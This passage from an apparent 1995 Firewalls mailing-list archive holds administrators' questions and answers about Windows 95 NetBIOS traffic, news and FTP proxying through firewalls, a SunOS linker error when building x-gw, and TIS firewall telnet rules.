(CDT) Cc: jcmurphy@smurfland.cit.buffalo.edu, maillet@doc.usmcs.maine.edu, firewalls@GreatCircle.COM In-Reply-To: from "David Miller" at May 17, 95 08:58:46 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 100 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Most of these files are likely to cause problems if they're just overwritten but how about .rhosts? From firewalls-owner Wed May 17 21:01:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA07563 for firewalls-outgoing; Wed, 17 May 1995 20:50:40 -0700 Received: from world1.worldbit.com (gw.worldbit.com [199.4.64.236]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA07557 for ; Wed, 17 May 1995 20:50:36 -0700 Received: (blast@localhost) by world1.worldbit.com (8.6.10/A/UX 3.1) id UAA03913; Wed, 17 May 1995 20:35:22 -0700 Date: Wed, 17 May 1995 20:35:21 -0700 (PDT) From: Tim Keanini To: firewalls@greatcircle.com Subject: WIN95 and UDP 137 and 138 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have solved a mystery on one of my internel networks. I would like to share it with you all: If you install the Windows 95 package, there are these broadcasted UDP packets that are on src and dst port 137 and 138 UDP. From what I have gathered, it is Windows 95 trying to tunnel NETBIOS via UDP. Just wanted to share. --blast %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \ Tim Keanini | "The limits of my language, / / aka blast | are the limits of my world." \ \ | --Ludwig Wittgenstein / / | \ \ +================================================/ / for more info on BayMOO... \ \ email baymoo@worldbit.com / %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Wed May 17 21:31:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA08343 for firewalls-outgoing; Wed, 17 May 1995 21:12:22 -0700 Received: from ix5.ix.netcom.com (ix5.ix.netcom.com [199.182.120.9]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA08333 for ; Wed, 17 May 1995 21:12:19 -0700 Received: from by ix5.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id VAA29506; Wed, 17 May 1995 21:11:32 -0700 Date: Wed, 17 May 1995 21:11:32 -0700 Message-Id: <199505180411.VAA29506@ix5.ix.netcom.com> From: mlebied@ix.netcom.com (Michael Lebiedzinski) Subject: NNTP through ANS Interlock To: firewalls@greatcircle.com Cc: MCCFWC01.MLEBIEDZ/G=Michael/S=Lebiedzinski/O=JNJ/DD=MCCFWC01.MLEBIEDZ@mhs-jnj.attmail.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have a rule setup for port 119 (NNTP) to allow connections. We are trying to use Netscape 1.1N to get USENET through the Interlock. Anyone know what to enter for: 1. News_Proxy 2. News_ProxyPort 3. NNTP server We do not archive news on the firewall. Is there anything else about this I should know. When I assign News_Proxy to the IP addr of the firewall and New_ProxyPort to 119 and the NNTP server to ixnews1.ix.netcom.com. I get a generic message from interserv.net and no news. Any information would be helpful. Please send to mlebied@ix.netcom.com and I'll summarize. Thanks, Michael From firewalls-owner Wed May 17 22:02:04 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA09036 for firewalls-outgoing; Wed, 17 May 1995 21:33:56 -0700 Received: from merlin.resmel.bhp.com.au (merlin.resmel.bhp.com.au [134.18.1.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA09021 for ; Wed, 17 May 1995 21:33:24 -0700 Received: from alpha (alpha.itwhy.bhp.com.au [134.18.56.252]) by merlin.resmel.bhp.com.au (8.6.11/8.6.11) with ESMTP id EAA03034 for ; Thu, 18 May 1995 04:32:25 GMT Received: from localhost (andrewp@localhost) by alpha (8.6.4/8.6.4) id OAA21893 for Firewalls@GreatCircle.COM; Thu, 18 May 1995 14:02:21 +0930 From: Andrew Prusek Message-Id: <199505180432.OAA21893@alpha> Subject: Re: FTP from Netscape problem (fwd) To: Firewalls@GreatCircle.COM Date: Thu, 18 May 1995 14:02:16 +0930 (CST) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2022 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following was sent to me instead of the whole list.. > From bin Thu May 18 13:09:11 1995 > Date: Wed, 17 May 1995 21:11:23 -0600 > From: mcknight@bullwinkle.scccc.com (Michael McKnight) > Message-Id: <9505172111.ZM2986@bullwinkle.scccc.com> > In-Reply-To: Andrew Prusek > "Re: FTP from Netscape problem" (May 18, 11:13am) > References: <199505180143.LAA20583@alpha> > Reply_To: mcknight@scccc.com > X-Mailer: Z-Mail (3.2.0 26oct94 MediaMail) > To: Andrew Prusek > Subject: Re: FTP from Netscape problem > Mime-Version: 1.0 > Content-Type: text/plain; charset=us-ascii > > It is obvious by the number of responses that I am the only one that > didn't know to use the http-gw proxy. Thanks all. > > I tried setting my ftp proxy to use the http-gw proxy and it > WORKS...sometimes. Two things I notice: > > 1) when my password is sent is sent as -gopher@boris.scccc.com; I don't > really care as long as it works but what's up with that. > > 2) It doesn't always work...more often than not I get a screen with the > words: FTP Error 404 Requested information not available. I realize that > sometimes I would get this because the service is unavailable, too many > anonynmous users, but I have tried this with some services that I know > are available. Any clues? > > TIA. > > > -- > Michael McKnight email: mcknight@scccc.com > SCC Communications Corp. Phone: (303) 581-5601 > 6285 Lookout Road Fax : (303) 581-0900 > Boulder, CO 80301-3343 > -- Andrew PRUSEK Phone: +61 86 40 4881 BHP Information Technology Fax: +61 86 40 4760 PO Box 21 / Port Augusta Road Email: andrewp@itwhy.bhp.com.au Whyalla SA 5600 Prefered OS: Linux Australia Disclaimer: My opinions are my own! Witty Saying: Common sense in not that common! From firewalls-owner Thu May 18 01:01:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA11672 for firewalls-outgoing; Thu, 18 May 1995 00:37:12 -0700 Received: from office.un.kiev.ua (office.un.kiev.ua [194.44.144.150]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA11658 for ; Thu, 18 May 1995 00:37:01 -0700 Received: (from scorp@localhost) by office.un.kiev.ua (8.6.12/0409) id KAA07713; Thu, 18 May 1995 10:35:12 +0300 Date: Thu, 18 May 1995 10:35:11 +0300 (EET DST) From: Slava Kritov X-Sender: scorp@office.un.kiev.ua To: Andrew Prusek cc: Firewalls@GreatCircle.COM Subject: Re: FTP from Netscape problem (fwd) In-Reply-To: <199505180432.OAA21893@alpha> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! On Thu, 18 May 1995, Andrew Prusek wrote: > > 2) It doesn't always work...more often than not I get a screen with the > > words: FTP Error 404 Requested information not available. I realize that > > sometimes I would get this because the service is unavailable, too many > > anonynmous users, but I have tried this with some services that I know > > are available. Any clues? Even more - in situation where you have several caching cern httpd's linked together through some firewalling mechanisms, its often just drops te connection without finishing all job. Quite distracting, actually. But I think this is mostly because of te ways any cern httpd implement proxying/caching ( I was even contacted Ari Luotonen on that topic ;) So I don't think there's much firewalls involved stuff ... Best Slava From firewalls-owner Thu May 18 01:23:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA11630 for firewalls-outgoing; Thu, 18 May 1995 00:33:30 -0700 Received: from office.un.kiev.ua (office.un.kiev.ua [194.44.144.150]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA11625 for ; Thu, 18 May 1995 00:33:01 -0700 Received: (from scorp@localhost) by office.un.kiev.ua (8.6.12/0409) id KAA07662; Thu, 18 May 1995 10:31:10 +0300 Date: Thu, 18 May 1995 10:31:09 +0300 (EET DST) From: Slava Kritov X-Sender: scorp@office.un.kiev.ua To: Tim Keanini cc: firewalls@greatcircle.com Subject: Re: WIN95 and UDP 137 and 138 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! On Wed, 17 May 1995, Tim Keanini wrote: > > I have solved a mystery on one of my internel networks. > I would like to share it with you all: > > If you install the Windows 95 package, there are these broadcasted UDP > packets that are on src and dst port 137 and 138 UDP. From what I > have gathered, it is Windows 95 trying to tunnel NETBIOS via UDP. Not only windows95, but also WfW with tcp protocol istalled. One of the best solutions for file services in a network consisting of Unixes ( ces;) and WfW - samba - is heavily relying on that ... BTW from the point of security its VERY good - I mean you don't need NFS, and you can easily block that kind of trafiic from going in/out... > > Just wanted to share. Just my 2 grivna's ( proposed, but not implemented ukrainian currency - thus being truly virtual ;) Best Slava Kritov, Senior Internetwork Specialist UN Internet Project in Ukraine From firewalls-owner Thu May 18 02:31:28 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA14258 for firewalls-outgoing; Thu, 18 May 1995 02:08:04 -0700 Received: from stroma.dcs.ed.ac.uk (stroma.dcs.ed.ac.uk [129.215.160.108]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA14247 for ; Thu, 18 May 1995 02:07:56 -0700 Received: from staffin.dcs.ed.ac.uk by dcs.ed.ac.uk id aa29702; 18 May 95 10:06 BST Newsgroups: cs-lists.firewalls Path: langa.dcs.ed.ac.uk!gdmr From: George Ross Subject: Re: building x-gw .. Message-Id: Organization: Department of Computer Science, University of Edinburgh X-Newsreader: xrn 7.03 References: Distribution: cs Date: Thu, 18 May 1995 09:06:15 GMT Lines: 31 Apparently-To: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jas (Matthew K) writes: > > On Wed, 17 May 1995, Darin Okuyama wrote: > > > cc -g -o x-gw x-gw.o ../libfwall.a ulib.a -L/usr/openwin/lib \ > > > -lXaw -lXmu -lXt -lXext -lX11 -lX -lm -lresolv > > > > > > ld: Undefined symbol > > > _get_wmShellWidgetClass > > > _get_applicationShellWidgetClass > > just thought i'd drop in this point here, so no more misconceptions > float around on this matter. it is a bug in the dynamic loader that > causes this bug from memory.. it is not a problem with Motif or > Openlook or anything.. the sunos faq should have a work around for > this, i cant remeber the exact semantics of it, but basically it > involves statically linking instead of dynamic linking.. This is getting a bit off topic, but you have four options: 1) Ignore it. The thing will run anyway! 2) -Bstatic -lXmu -Bdynamic 3) Get Sun's patch 100573-xx (and maybe also 100512-xx) 4) Use the X11Rn libraries instead. BTW, I think that "-lX" is bogus. -- Dr George D M Ross, Department of Computer Science, University of Edinburgh Kings Buildings, Mayfield Road, Edinburgh, Scotland, EH9 3JZ Mail: gdmr@dcs.ed.ac.uk Voice: +44 131 650 5147 Fax: +44 131 667 7209 From firewalls-owner Thu May 18 03:01:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA14717 for firewalls-outgoing; Thu, 18 May 1995 02:47:33 -0700 Received: from beijing2.cernet.edu.cn (cernet.edu.cn [166.111.250.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA14712 for ; Thu, 18 May 1995 02:47:24 -0700 Received: by beijing2.cernet.edu.cn (4.1/SMI-4.1) id AA01655; Thu, 18 May 95 17:48:34 CDT Date: Thu, 18 May 95 17:48:34 CDT From: yang@cernet.edu.cn (Yang Jia Hai) Message-Id: <9505180848.AA01655@beijing2.cernet.edu.cn> To: firewalls@GreatCircle.com Subject: Problems :telnet with firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, gentlemen, I'm a beginner at firewall. These days, I ftped a public domain of Firewall, which maintains by Trusted Information System, Inc.. I've installed it successfully. But as I configured it. The permit/deny mechanism for ftp is OK, but it doesn't work for TELNET. Although I put a permit rule for a specific host, this host just can't log into my firewall station. It seems that it just deny everything?!! Does anyone give me a clue? Any suggestions would be appreciated. Thanks in advance. Yang Jiahai, Dept. of Computer Science, Tsinghua Univ., Beijing, PRC. Email address: yang@cernet.edu.cn From firewalls-owner Thu May 18 03:31:42 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA15083 for firewalls-outgoing; Thu, 18 May 1995 03:04:51 -0700 Rece